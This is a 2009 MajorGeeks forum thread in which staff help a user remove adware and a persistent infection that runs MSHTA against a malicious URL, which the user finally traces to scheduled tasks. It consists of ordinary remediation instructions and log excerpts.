MSHTA keeps running

Discussion in 'Malware Help (A Specialist Will Reply)' started by cojo_cojo, Feb 7, 2009.

  1. cojo_cojo

    cojo_cojo Private E-2

    AVG keeps telling me about a threat detection as follows;

    wrksqumczgeilnapirro.cn/s_t_t.php Exploit JavaScript Obfuscation

    It does nothing about it, it just tells me, over and over again.

    In addition to this I end up with dozens of MSHTA processes running on the system and the only way to get rid of them is to end them via the End Process function.

    I've searched everywhere on google and can find nothing similar. I have searched the PC for any existence of this strange PHP file and nothing there either.

    Can any one help tell me what this is - I have atttached a Hijack This log if it helps. Many thanks
     
    cojo_cojo, Feb 7, 2009
    #1
  2. cojo_cojo

    cojo_cojo Private E-2

    sorry - forgot the hijackthislog - thanks

     
    Last edited by a moderator: Feb 10, 2009
    cojo_cojo, Feb 8, 2009
    #2
  3. bjgarrick

    bjgarrick MajorGeeks Admin - Malware Expert

    http://www.majorgeeks.com/images/grenade.gifWelcome! to MajorGeeks.com!http://www.majorgeeks.com/images/grenade.gif

    Please follow the instructions in the READ & RUN ME FIRST link given further down and attach the requested logs when you finish these instructions.
    • If you have problems where no tools seem to run, please try following the steps given in the below and then continue on no matter what you find. You only need to try the TDSSserv steps if having problems getting scans in the Read & Run Me First.
    • If something does not run, write down the info to explain to us later but keep on going.
    • Do not assume that because one step does not work that they all will not.
    READ & RUN ME FIRST. Malware Removal Guide


    Helpful Notes:

    1. If you run into problems trying to run the READ & RUN ME or any of the scans in normal boot mode, you can run the steps in Safe Mode but make sure you tell us what you did later when you post logs. See the below if you do not know how to boot in safe mode:
    2. If you have problems downloading on the problem PC, download the tools and the manual updates for SUPERAntiSpyware, Malwarebytes and Spybot ( links are given in the READ & RUN ME) onto another PC and then burn to a CD. Then copy them to the problem PC. You will have to skip getting updates if (and only if) your internet connection does not work. Yes you could use a flash drive too but flash drives are writeable and infections can spread to them.
    3. To avoid additional delay in getting a response, it is advised that after completing the READ & RUN ME you also read this sticky:
    4. Any additional post is a bump which will add more delay. Once you attach the logs, your thread will be in the work queue and as stated our system works the oldest threads FIRST.
     
    bjgarrick, Feb 10, 2009
    #3
  4. cojo_cojo

    cojo_cojo Private E-2

    Hi Thank you for that comprehensive list - Which I think I've managed to run ok. I attach the last set of zip files for your perusal.

    I have also attached a word document which contains a screen shot of an incident prior to the capture of all this information which may help understand why MSHTA keeps running - I had a thing called Process Explorer running - which you will see in the background, and in the foreground is AVG's message warning of the threat.

    I saw a very brief but not very explanatory note on a search that AVG may have previously found a problem but not completed the job - the suggestion was that "It has deleted the 'file' but not the service that calls it'. All gobbleydegook to me, but thought it may help. Many thanks again for your time.
     

    Attached Files:

    cojo_cojo, Feb 10, 2009
    #4
  5. bjgarrick

    bjgarrick MajorGeeks Admin - Malware Expert

    I still need some more logs from the READ ME.

    • ComboFix Log
    • SUPERAntiSpyware Log
    • Malwarebytes Anti-Malware Log
     
    bjgarrick, Feb 10, 2009
    #5
  6. cojo_cojo

    cojo_cojo Private E-2

    ok sorry here they are
     

    Attached Files:

    cojo_cojo, Feb 11, 2009
    #6
  7. cojo_cojo

    cojo_cojo Private E-2

    ...oh and also the MSHTA problem still exists, one interesting new item to add is that each occurence of it now seems to be taking up more memory and a more consistent volume (around 13m) whereas before the amount of memory each instance occupied seemed to vary between 400k and 12m ?
    Thanks again for your help thus far.
    regards
     
    cojo_cojo, Feb 11, 2009
    #7
  8. bjgarrick

    bjgarrick MajorGeeks Admin - Malware Expert

    First, let's shorten up the logs. Click Start > Run > type notepad and press ENTER.

    Once Notepad comes up, type the below into Notepad.
    Once your done, click on File > Save As > fix.bat and save to your desktop.

    Once you're done, locate the file on your desktop "fix.bat" and double click on it. A command prompt will flash, once it goes away run ComboFix again and attach a new log.

    Also, run the C:\MGtools\GetLogs.bat file by double clicking on it, attach the new set of logs to your next post.
     
    bjgarrick, Feb 12, 2009
    #8
  9. cojo_cojo

    cojo_cojo Private E-2

    Thanks again - here are the details.
     

    Attached Files:

    cojo_cojo, Feb 12, 2009
    #9
  10. bjgarrick

    bjgarrick MajorGeeks Admin - Malware Expert

    Let's do once more quick fix to shorten the logs up...

    Now we need to use ComboFix to remove a bunch of malware files.
    • Make sure that combofix.exe that you downloaded while doing the READ & RUN ME is on your Desktop but Do not run it!
      • If it is not on your Desktop, the below will not work.
    • Open Notepad and copy/paste the text in the below quote box into it:
    • Save the above as CFscript.txt and make sure you save it to the same location (should be on your Desktop) as ComboFix.exe
    • At this point, you MUST EXIT ALL BROWSERS NOW before continuing!
    • You should have both the ComboFix.exe and CFScript.txt icons on your Desktop.
    • Now use your mouse to drag CFscript.txt on top of ComboFix.exe
    • Follow the prompts.
    • When it finishes, a log will be produced named c:\combofix.txt
    • I will ask for this log below
    Note:

    Do not mouseclick combofix's window while it is running. That may cause it to stall.
    Finally...
    Run the C:\MGtools\GetLogs.bat file by double clicking on it (Note: if using Vista, don't double click, use right click and select Run As Administrator).

    Then attach the below logs:
    • C:\ComboFix.txt
    • C:\MGlogs.zip
    Let me know of any problems you may have encountered with the above instructions and also let me know how things are running now.
     
    bjgarrick, Feb 14, 2009
    #10
  11. cojo_cojo

    cojo_cojo Private E-2

    Sorry about the delay in replying but I've been away on holiday. Here are the attached logs from your most recent instruction, many thanks for your help.
    I may be separated from my PC for a further 5 days so will return any further info to you then. Regards
     

    Attached Files:

    cojo_cojo, Feb 22, 2009
    #11
  12. cojo_cojo

    cojo_cojo Private E-2

    Hi bjgarrick ? Have you had any more thoughts on this post? Been grateful for your help thus far. Many thanks
     
    cojo_cojo, Mar 1, 2009
    #12
  13. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

    SInce you never put your PC into normal startup mode with MSconfig as requested in step 1 of the READ & RUN ME, you still have outstanding issues. You need to put your PC into normal startup mode and remain in that mode. After doing this you need to attach a new MGtools log so we can finish your cleaning instructions.

    In addition you had AVG running while trying to use ComboFix and it cause the fix not to work. While not specifically stated in BJ's instructions this info was stated in the original instructions for using ComboFix and always applies.
     
    chaslang, Mar 3, 2009
    #13
  14. cojo_cojo

    cojo_cojo Private E-2

    Ok thanks for this. I went back to Normal mode startup - and allowed all the various programs to start, including AVG. I tried my level best to disable AVG and stop its component parts running, but it is very insistent. Infact the only way to really stop it seems to be to 'untick' using msconfig, but that conflicted with what you wanted me to do in respect of starting up in Normal Mode.

    Anyhow, its done now and I hope the results are a little more helpful - I attach them as requested.

    The problem still persists, if its of any help there is almost a regularity about the warnings I get from AVG about this MSHTA thing, its as if something somewhere is using MSHTA to kick something off at a regular interval.

    Anyway - hope you can help - I still cannot find anybody in the entire world on the internet who seems to have a similar problem to this.

    many thanks
     

    Attached Files:

    cojo_cojo, Mar 5, 2009
    #14
  15. cojo_cojo

    cojo_cojo Private E-2

    ..and one other attachment as well so you can see what I'm seeing. Many thanks.
     

    Attached Files:

    cojo_cojo, Mar 5, 2009
    #15
  16. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

    Actually there are many better ways. Step 1 of the READ & RUN ME gave you this link: Dealing with Startup Processes

    There are a couple right here in this forum. ;)

    I still strongly suggest that you uninstall MessengerPlus! 3 as stated in step 1 of the READ & RUN ME.

    You need to run Spybot and select the Immunize feature and allow it to Immunize your PC as requested in the READ & RUN ME. After you click Immunize it scans to see what needs to be Immunized. Then you need to click the green + sign at the top to actually Immunize.



    Now let's flush the Java Cache
    • Click Start > Settings > Control Panel
    • Double click the Java icon (be patient, it may take a while to open)
    • Now click the General tab and under the Temporary Internet File area
    • Click the Settings button and then click the Delete Files... button.
    • In the next popup click OK.
    If you have multiple Java plugin icons in Control Panel follow the above to clear all their caches.


    Now let's flush the Internet Explorer Cache



    To flush your Internet Explorer Cache:
    • click Tools
    • Internet Options
    • Now on the General tab and click Delete Files and select Delete all Offline content too
    • Click OK.
    • When it finishes Click OK.
    Run this Disable/Remove Windows Messenger to remove Windows Messenger. Do not confuse Windows Messenger with MSN Messenger because they are not the same. Windows Messenger is a frequent cause of popups.

    Uninstall the below software:
    Dealio Toolbar 3.4 <-- should have been uninstalled in step 1 of the READ ME
    Java(TM) 6 Update 10
    Search Settings 1.2 <-- should have been uninstalled in step 1 of the READ ME

    Run C:\MGtools\analyse.exe by double clicking on it (Note: if using Vista, don't double click, use right click and select Run As Administrator). This is really HijackThis (select Do a system scan only) and select the following lines but DO NOT CLICK FIX until you exit all browser sessions including the one you are reading in right now:


    O2 - BHO: DealioBHO Class - {6A87B991-A31F-4130-AE72-6D0C294BF082} - C:\Program Files\Dealio\kb127\Dealio.dll
    O3 - Toolbar: Dealio - {E67C74F4-A00A-4F2C-9FEC-FD9DC004A67F} - C:\Program Files\Dealio\kb127\Dealio.dll
    O4 - HKLM\..\Run: [UpdReg] ; C:\WINDOWS\UpdReg.EXE
    O4 - HKLM\..\Run: [SearchSettings] C:\Program Files\Search Settings\SearchSettings.exe
    O4 - HKLM\..\Run: [RealTray] ; C:\Program Files\Real\RealPlayer\RealPlay.exe SYSTEMBOOTHIDEPLAYER
    O4 - HKLM\..\Run: [au] C:\Program Files\Dealio\DealioAU.exe
    O8 - Extra context menu item: Compare Prices with &Dealio - C:\Documents and Settings\Colin\Application Data\Dealio\kb127\res\DealioSearch.html
    O9 - Extra button: Dealio - {E908B145-C847-4e85-B315-07E2E70DECF8} - C:\Program Files\Dealio\kb127\Dealio.dll
    O9 - Extra 'Tools' menuitem: Dealio - {E908B145-C847-4e85-B315-07E2E70DECF8} - C:\Program Files\Dealio\kb127\Dealio.dll
    O16 - DPF: {70BA88C8-DAE8-4CE9-92BB-979C4A75F53B} - http://launch.gamespyarcade.com/software/launch/alaunch.cab

    I also suggest that you optionally fix the below non-malware but unnecessary startups.
    O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
    O4 - HKLM\..\Run: [HP Software Update] C:\Program Files\Hp\HP Software Update\HPWuSchd2.exe
    O4 - HKLM\..\Run: [HP Lamp] ; "C:\Program Files\Hewlett-Packard\HP PrecisionScan\PrecisionScan Pro\hplamp.exe"
    O4 - HKLM\..\Run: [DMXLauncher] ; C:\Program Files\Dell\Media Experience\DMXLauncher.exe
    O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
    O4 - HKLM\..\Run: [Adobe Photo Downloader] ; "C:\Program Files\Adobe\Photoshop Album Starter Edition\3.0\Apps\apdproxy.exe"
    O4 - HKCU\..\Run: [DellTransferAgent] ; "C:\Documents and Settings\All Users\Application Data\Dell\TransferAgent\TransferAgent.exe"
    O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
    O4 - Global Startup: InterVideo WinCinema Manager.lnk = C:\Program Files\InterVideo\Common\Bin\WinCinemaMgr.exe

    After clicking Fix, exit HJT.





    Now download The Avenger by Swandog46, and save it to your Desktop.
    • Extract avenger.exe from the Zip file and save it to your desktop
    • Run avenger.exe by double-clicking on it.
    • Do not change any check box options!!
    • Copy everything in the Quote box below, and paste it into the Input script here: part of the window:
    • Now click the Execute button.
    • Click Yes to the prompt to confirm you want to execute.
    • Click Yes to the Reboot now? question that will appear when Avenger finishes running.
    • Your PC should reboot, if not, reboot it yourself.
    • A log file from Avenger will be produced at C:\avenger.txt and it will popup for you to view when you login after reboot.
    After reboot look for all of the above files we had Avenger attempt to delete. If you still see them, delete them yourself.

    Also delete all files in the below folders except ones from the current date (Windows will not let you delete the files from the current day).
    C:\WINDOWS\TEMP
    C:\Documents and Settings\Sean Walsh\Local Settings\Temp


    Now run Ccleaner to remove temp files!

    Now goto this link Using MGtools and download the new version of MGtools.exe from the black bold print link in the first sentence. Overwrite your previous MGtools.exe file with this one.




    Then attach the below logs:
    • C:\avenger.txt
    • C:\MGlogs.zip
    Make sure you tell me how things are working now!
     
    Last edited: Mar 8, 2009
    chaslang, Mar 7, 2009
    #16
  17. cojo_cojo

    cojo_cojo Private E-2

    Thanks for this - I pretty much cleared out all the things you said, although many of them were not there (e.g. Windows Messenger). I attach the logs requested.

    AVG is still popping up with the warnings and MSHTA is still running dozens of versions in the process window....well after about an hour there are dozens running.

    Apologies but I forgot to run CCleaner till after MGTools, but I checked the directories you asked me to and they were virtually empty apart from a few files from todays date.

    Many thanks I hoep this helps.
     

    Attached Files:

    cojo_cojo, Mar 8, 2009
    #17
  18. cojo_cojo

    cojo_cojo Private E-2

    SOLVED

    I think I found it. I figured out that the AVG prompt kept coming up at regular rather than random intervals , and so it was, exactly 15 minute intervals. I figured that the Scheduled Task window was a good place to check so I went into this via Accesories, System Tools and lo and behold there were around 90 items called at1 , at2, at3 etc etc and a right-click, properties revealed that each of them called MSHTA.exe with a parameter that was the enormously long and complicated php file name described in previous hosts.

    I deleted them all and the problem has gone away, fantastic - what I do not know is how it got there in the first place, nor what it was trying to do.

    Thanks for all your help, perhaps this may help someone else who gets this problem, although I've yet to find anyone else who has.

    Many thanks
     
    cojo_cojo, Mar 8, 2009
    #18
  19. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

    You're welcome.

    Good job!

    Yes! I inadvertently left those out of the Avenger fix. I had them in a ComboFix script I was working out but forgot to put them into the Avenger fix. You can see that these were detected and show in the runkeys.txt log which is in the MGlogs.zip file.

    Your logs are clean.


    If you are not having any other malware problems, it is time to do our final steps:
    1. We recommend you keep SUPERAntiSpyware and Malwarebytes Anti-Malware for scanning/removal of malware. Unless you purchase them, they provide no protection. They do not use any significant amount of resources ( except a little disk space ) until you run a scan.
    2. If we had you use ComboFix, uninstall ComboFix (This uninstall will only work as written if you installed ComboFix on your Desktop like we requested.)
      • Click START then RUN and enter the below into the run box and then click OK. Note the quotes are required
      • "%userprofile%\Desktop\combofix" /u
        • Notes: The space between the combofix" and the /u, it must be there.
        • This will uninstall ComboFix and also reset hidden files and folders settings back to Windows defaults.
      • Delete the C:\combofix folder from combofix (if it exists)
    3. If we had you run Avenger, you can delete all files related to Avenger now.
    4. Any other miscellaneous tools we may have had you install or download can be uninstalled and deleted.
    5. If we had you download any registry patches like fixme.reg or fixWLK.reg (or any others), you can delete these files now.
    6. If running Vista, it is time to make sure you have reenabled UAC by double clicking on the C:\MGtools\enableUAC.reg file and allowing it to be added to the registry.
    7. Go to add/remove programs and uninstall HijackThis.
    8. You can delete the C:\MGtools folder and the C:\MGtools.exe file. You can also delete the C:\MGlogs.zip
    9. If you are running Vista, Windows XP or Windows ME, do the below:
      • Refer to the cleaning procedures in step 3 the READ ME for your Window version and see the instructions to Disable System Restore which will flush your Restore Points.
      • Then reboot and Enable System Restore to create a new clean Restore Point.
    10. After doing the above, you should work thru the below link:
     
    chaslang, Mar 12, 2009
    #19
  20. cojo_cojo

    cojo_cojo Private E-2

    Appreciate all your help - many thanks



     
    cojo_cojo, Mar 15, 2009
    #20
  21. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

    You're welcome. Surf safely!
     
    chaslang, Mar 17, 2009
    #21

MajorGeeks.Com Menu

Downloads All In One Tweaks \ Android \ Anti-Malware \ Anti-Virus \ Appearance \ Backup \ Browsers \ CD\DVD\Blu-Ray \ Covert Ops \ Drive Utilities \ Drivers \ Graphics \ Internet Tools \ Multimedia \ Networking \ Office Tools \ PC Games \ System Tools \ Mac/Apple/Ipad Downloads

Other News: Top Downloads \ News (Tech) \ Off Base (Other Websites News) \ Way Off Base (Offbeat Stories and Pics)

Social: Facebook \ YouTube \ Twitter \ Tumblr \ Pintrest \ RSS Feeds